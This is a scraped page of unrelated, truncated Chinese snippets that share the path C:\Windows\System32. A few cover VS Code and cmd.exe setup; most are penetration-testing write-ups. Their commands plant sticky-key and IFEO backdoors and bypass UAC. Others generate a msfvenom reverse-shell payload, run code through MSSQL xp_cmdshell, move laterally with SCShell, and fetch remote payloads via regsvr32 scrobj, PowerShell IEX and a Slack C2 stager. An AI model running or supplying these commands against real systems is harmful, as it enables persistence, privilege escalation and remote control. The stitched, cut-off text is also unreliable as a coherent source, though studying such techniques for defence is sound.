1、开发环境搭建以及编写第一个C程序 这里网上已经有很多教程了,我就不再造轮子,直接上一个我觉得写得还不错得链接:VS Code配置C语言开发环境的超详细教程 - 知乎 (zhihu.com) 2、运行程序时遇到的坑...错误1:运行代码报错 报错显示: gcc : 无法将“gcc”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。...请检查名称的拼写,如果包括路径,请确保路径正确,然后再试一次。...,设置步骤如下: 找到Code.exe位置 右键打开属性→找到兼容性→勾选以管理员身份运行此程序→点击应用 设置完成后重启vscode,完美解决~ 错误2:调试模式报错 报错显示: Unable to...Unexpected GDB output from command "-environment -cd xxx" No such file or 解决办法: 就一步:中文路径的问题,改掉就行
大家好,又见面了,我是你们的朋友全栈君。 目录 1. 简介 2. 后门原理 3....后门原理 在C盘C:\Windows\System32目录下存在sethc.exe文件,正常情况下会执行sethc.exe文件,但是当我们将cmd.exe文件把sethc.exe文件通过更改名称给覆盖掉...后门制作 3.1 方法一 cmd覆盖sethc copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe //如果没指定生成的文件.../d y # 获取整个文件夹及其下面子目录文件的所属权 cacls c:\windows\system32\*.* /T /E /G administrators:F # 将所有c:\windows...Options\sethc.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe” 该操作为添加注册表,引号内的内容为要将注册表项添加到
将c:windows/system32/sethc.exe替换为cmd.exe文件,达到新增用户、修改账号密码的的目的。...当然,除了这个程序之外,还有以下多个程序的快捷方式: 屏幕键盘:C:\Windows\System32\osk.exe 放大镜:C:\Windows\System32\Magnify.exe 旁白:C:...\Windows\System32\Narrator.exe 显示切换器 C:\Windows\System32\DisplaySwitch.exe 应用切换器:C:\Windows\System32\...环境准备 实验主机:Windows7旗舰版 (无任何杀软) 3. shift后门复现 3.1测试是否存在粘滞键 在正常登录的Windows7用户桌面连续摁5次shift键,看是否有粘滞键提示弹出: 此时有弹出...通过解密可知当前密码为:admin 3.6 删除新增用户 此时将机器重启,利用test admin进行登录,再将当前的test2用户删除: 进入环境之后,发现是无法找到cmd程序的,因此在这里需要找到已经修改过的
操作系统: Windows server 2008 R2(64位) C:\Windows\System32\WindowsPowerShell\v1.0\Modules 下有ServerManager的东东...一个是:C:\Windows\System32\CMD.exe(这个是64位的CMD,尽管名字叫System32);一个是C:\Windows\SysWOW64\CMD.exe(这个是32位的CMD.SysWOW64...文件夹下的东西是64位操作系统为运行32位的应用程序而准备的)。...可是我编译生成的.exe是32位的,通过Setup Factory的File.Run(...)或者Shell.Execute(...)...,会调用C:\Windows\SysWOW64\CMD.exe(32位的CMD)。而ServerManager Module只有64为才有 所以改为编译成64位的就好了。
而很多老项目配置环境有很多种方式. 如配置在visual studio 中编写. 配置在 notepad++中编写. 搜索全网也没看到有VsCode配置的方式. 索性这里就写一下...."BuildDebug64_Win7OrHigh", "type": "shell", "command": "C:\\Windows\\System32\\cmd.exe",...\\Windows\\System32\\cmd.exe", "args": [ "/k", "pushd \".\" && call \"C:\\WinDDK...\\Windows\\System32\\cmd.exe", "args": [ "/k", "pushd \".\" && call \"C:\\WinDDK...\\Windows\\System32\\cmd.exe", "args": [ "/k", "pushd \".\" && call \"C:\\WinDDK
0x00:简介 快捷方式是win系统下为各种程序、文件、文件夹提供的一种快速启动程序。 后缀名大多为(.lnk),少见的后缀名有(.pif)、(.url)。 早期的“桌面图标lnk木马”也是危害一时。...0x01:环境准备 1、MSF 2、UPX(pip install upx) 3、数字签名添加器(https://www.ttrar.com/html/7418.html) 4、Phpstudy 5、攻击机器...1、编码、捆绑(正常的32位calc.exe) msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai...cmd.exe,所以上传的程序就是cmd.exe) 2、jaky666.exe查杀 http://r.virscan.org/language/zh-cn/report/8773a7a9dfd1a48becd614e70bc689d3...或者更加高明的隐藏 3、该“恶意程序”只是做了简单的免杀,甚至并不免杀。
,首先会读取其Manifest信息,如果autoElevate字段存在且为true则认为其是可自动提升权限的程序,且会检查其系统的签名,然后还会检查其文件是否处于可信任目录中C:\Windows\System32...\\C:\\Windows " md "\\\\?\\C:\\Windows \\System32" copy c:\\windows\\system32\\winsat.exe "\\\\?...我们可以利用ExportsToC++或者AheadLib来获取导出函数。这里我用的ExportsToC++去导出d3d11.dll的函数。这里的dll要是原始目录下的dll文件。...这里的dll要填写如下格式。 C:\\\\Windows\\\\System32\\\\d3d11.dll 点击ok即可获取导出函数。 重命名后将其放入白名单文件的同一目录中。...获取组策略凭据 在大型环境环境或域环境中,管理员往往会通过下发组策略对所有加入域的计算机的本地管理员密码进行批量修改; 新建一个组策略后,域控制器会在SYSVOL共享目录中生成一个XML文件,在文件保存了组策略更新后的密码
/EQGRP_Lost_in_Translation/tree/master python环境 必须在Python2.6 和 pywin32-221环境下,如果你用其他环境,会报各种诸如模块/dll缺失等错误...然后我们把windows文件夹复制到pentestbox目录下 ? 这里我把windows里的文件放到pentestbox根目录下的ms17-010文件夹内 ?...,我一般不用它,我通常是在自己的vps服务器进行监听 本地测试时候可以找一台kali攻击机 dll木马我们可以提前生成好放在u盘里带着,随时备用*_* 接下来我们用Msf进行监听 use exploit...设置dll木马路径,我已经提前生成好放在u盘里随身携带,随时备用~ ? ? 然后设置要注入的程序,默认是lsass.exe ?...\windows\\system32 #上传文件 search –d c:\\windows –f *.mdb #在目标主机Windows目录中搜索文件s 执行程序 execute
一旦进程获取了正确的身份验证,即可使用OpenSCManagerA远程打开目标主机上Service Manager ? 使用OpenServiceA API打开远程服务并抛出错误 ?...\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll...txt来证明可以利用 在win中 scshell.exe 10.10.10.10 defragsvc "C:\windows\system32\cmd.exe /c echo ' hello' > c...\scshell.exe 10.10.10.10 defragsvc "C:\windows\system32\cmd.exe /c echo ' hello' > c:\windows\temp\lat2...shell scshell.exe 10.10.10.10 defragsvc "C:\windows\system32\cmd.exe /c powershell.exe IEX(New-Object
演示: 粘滞键位置:c:\windows\system32\sethc.exe 命令: move sethc.exe sethc1.exe copy cmd.exe sethc.exe 此时连按五次shift...4 映像劫持 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定...,添加debugger键的值为c:\windows\system32\cmd.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion...\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f...\windows\system32\calc.exe c:\Users\ndsec\Desktop\calc.exe bitsadmin /SetNotifyCmdLine test cmd.exe "
使用SET命令可以列出环境变量,如下: %ALLUSERSPROFILE% 本地 返回 "所有用户" 配置文件的位置 %APPDATA% 本地 返回默认情况下应用程序存储数据的位置 %CD% 本地 返回当前目录字符串...也就是返回 cmd.exe 的路径,一般在 C:\WINDOWS\system32\cmd.exe %DATE% 系统 返回当前日期字符串。...由 Cmd.exe 生成 %RANDOM% 系统 返回 0 到 32767 之间的任意十进制数字。...由 Cmd.exe 生成 %SYSTEMDRIVE% 系统 返回包含Windows server operation system根目录(即系统根目录)的驱动器 %SYSTEMROOT% 系统 返回 Windows...c:/ 然后输入 test.bat 我是第一个参数 我是第二个参数 我是第三个参数 我是第四个参数 注意中间的空额,我们会看到这样的结果: 我是第一个参数 我是第二个参数 我是第三个参数
forfiles /p 指定搜索文件的目录 /m 指定搜索关键词 /c 指定要执行的命令 forfiles /p c:\windows\system32 /m calc.exe /c c:\tmp\evil.exe.../windows/system32/calc.exe" cmd.exe /c "ping ;a.exe; 127.0.0.1/../../../../../../../../.....其细分思路就包括怎么把shellcode进行混淆了,简单的有XOR,BASE64,复杂一点的有AES等。 这里就只说说xor。 首先我们得准备一个程序将shellcode进行混淆。...沙箱对恶意程序的检测流程大致如下 1.启动虚拟环境 2.将恶意程序复制进虚拟环境 3.运行恶意程序一段时间(一般为5分钟) 4.获取虚拟环境返回的报告 5.关机 全程不过6.7分钟,而正常的机器运行时间肯定是大于这个值的...,启动exe文件应该是双击运行,程序启动后父进程是explore.exe,如果是cmd运行则会是cmd.exe、 但是对于沙箱就有可能存在用一个程序如windbg来启动我们的恶意EXE文件,这个时候我们就需要对此点进行检测
挖掘白名单的uac程序 有一些系统程序是会直接获取管理员权限同时不弹出UAC弹窗,这类程序被称为白名单程序。这些程序拥有autoElevate属性的值为True,会在启动时就静默提升权限。...\\Windows\\System32\\cmd.exe", (LPSTR)"/c C:\\Windows\\System32\\ComputerDefaults.exe", NULL, NULL, FALSE...char filePath[] = "C:\\Windows\\System32\\cmd.exe"; 实现效果如下 bypassuac1 这里cmd的实现成功了,那么直接使用cs的马上线能不能够直接...cs的木马,第一个就是我们通过我们写的程序上线的,第二个就是直接点击上线的,看一下区别 仔细看的话这里bypass过的右上角有一个* image-20211017101100492 首先看一下第一个对话...获取到的权限也是bypassuac后的权限 image-20211017102832575 再看一下360,这里我试了两个方法,第一种方法是直接对artifact.exe做一下免杀,然后执行bypassuac.exe
CGI脚本用于执行Tomcat Java虚拟机(JVM)外部的程序。默认情况下禁用的CGI Servlet用于生成从查询字符串生成的命令行参数。...由于Java运行时环境(JRE)将命令行参数传递给Windows的错误,在启用CGI Servlet参数enableCmdLineArguments的Windows计算机上运行的Tomcat服务器很容易受到远程代码执行的影响...ProcessImpl()构建Cmdline并将其传递给CreateProcess() Windows函数,之后CreateProcess() 在cmd.exe shell环境中执行.bat和.cmd...然后CreateProcess()在阶段1重新启动,批处理文件的名称作为cmd.exe的第一个参数传递。...这导致’hello.bat …’成为’C:\ Windows \ system32 \cmd.exe / c“hello.bat …” ’。
是Windows子系统的内核部分,是一个内核模式设备驱动程序,它 包含有窗口管理器、后者控制窗口显示和管理屏幕输出等。...如果Windows内核模式驱动程序不正确地处 理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代 码。...攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。...在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic 只需要添加C:\Windows\System32.../administrator:@192.168.3.32 create -name shell -display shellexec -path C:\Windows\System32\shell.exe
编译 注意:服务器是用Python 3编写的 为此您需要准备 1.Slack工作区 2.并为slack应用设置以下权限: channels:read channels:history channels:...powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe...stager - 生成单行程序以下载执行植 quit - 退出程序 wipefiles - 从Slack中删除所有上传的文件 代理进入后,您可以与其进行交互。...以下是几个不执行cmd.exe/的OPSEC安全命令bash: - cat - 打印文件内容 - cd - 更改目录 - find - 搜索目录文件名 - getip - 获取外部IP地址(发出DNS请求...代理程序是针对Windows,Mac和Linux编译的,但主要是使用Windows 10进行测试。代理程序可能会错误处理该代理程序平台不支持的命令(不要尝试对Mac进行小型化)。 它的规模如何?
挖掘白名单的uac程序 有一些系统程序是会直接获取管理员权限同时不弹出UAC弹窗,这类程序被称为白名单程序。 这些程序拥有autoElevate属性的值为True,会在启动时就静默提升权限。...\\Windows\\System32\\cmd.exe", (LPSTR)"/c C:\\Windows\\System32\\ComputerDefaults.exe", NULL, NULL, FALSE...char filePath[] = "C:\\Windows\\System32\\cmd.exe"; 实现效果如下 bypassuac1.gif 这里cmd的实现成功了,那么直接使用cs的马上线能不能够直接...cs的木马,第一个就是我们通过我们写的程序上线的,第二个就是直接点击上线的,看一下区别 仔细看的话这里bypass过的右上角有一个* image-20211017101100492.png 首先看一下第一个对话...-20211017102642754.png 获取到的权限也是bypassuac后的权限 image-20211017102832575.png 再看一下360,这里我试了两个方法,第一种方法是直接对artifact.exe
比如最常见的按5下shift出现的粘滞键Sethc.exe,还有Windows + U组合键时启动的utilman.exe程序 还有: 屏幕键盘:C:\Windows\System32\osk.exe...c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe ?...这样成功执行的是遭到“劫持”的虚假程序。 可视化修改 在iexplorer.exe中加入键值对:debugger c:\windows\system32\cmd.exe ?..." /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f ?...name Userinit -value "C:\Windows\system32\userinit.exe,C:\Windows\system32\cmd.exe" 0x07 Logon Scripts
在学习MSSQL过程中也阅读了几十篇中英文MSSQL相关技术文章,最终按照作者我的思路进行总结,相关参考文章也在文中有列出。此外,文中可能会出现部分错误,望读者指出,谢谢。...\windows\system32\cmd.exe /c whoami >c:\\sqltest.txt';回显0表示成功 由于这里是无回显的命令执行,到另一台主机上查看效果,成功写入。...openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe...\windows\system32\ias\ias.mdb','select shell("cmd.exe /c whoami >c:\\sqltest.txt ")'); 在win2003的c盘上看到已经创建了该文件...\windows\system32\cmd.exe' 2)查看是否修改成功文件 exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft
大家好,又见面了,我是你们的朋友全栈君。...下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!...-h -r -s del c:\windows\system32\sethc.exe copy c:\windows\explorer.exe c:\windows\system32\sethc.exe... copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe attrib c:\windows\system32...\sethc.exe +h +r +s attrib c:\windows\system32\dllcache\sethc.exe +h +r +s 如果出现拒绝等错误 那就没法了!
领取专属 10元无门槛券
手把手带您无忧上云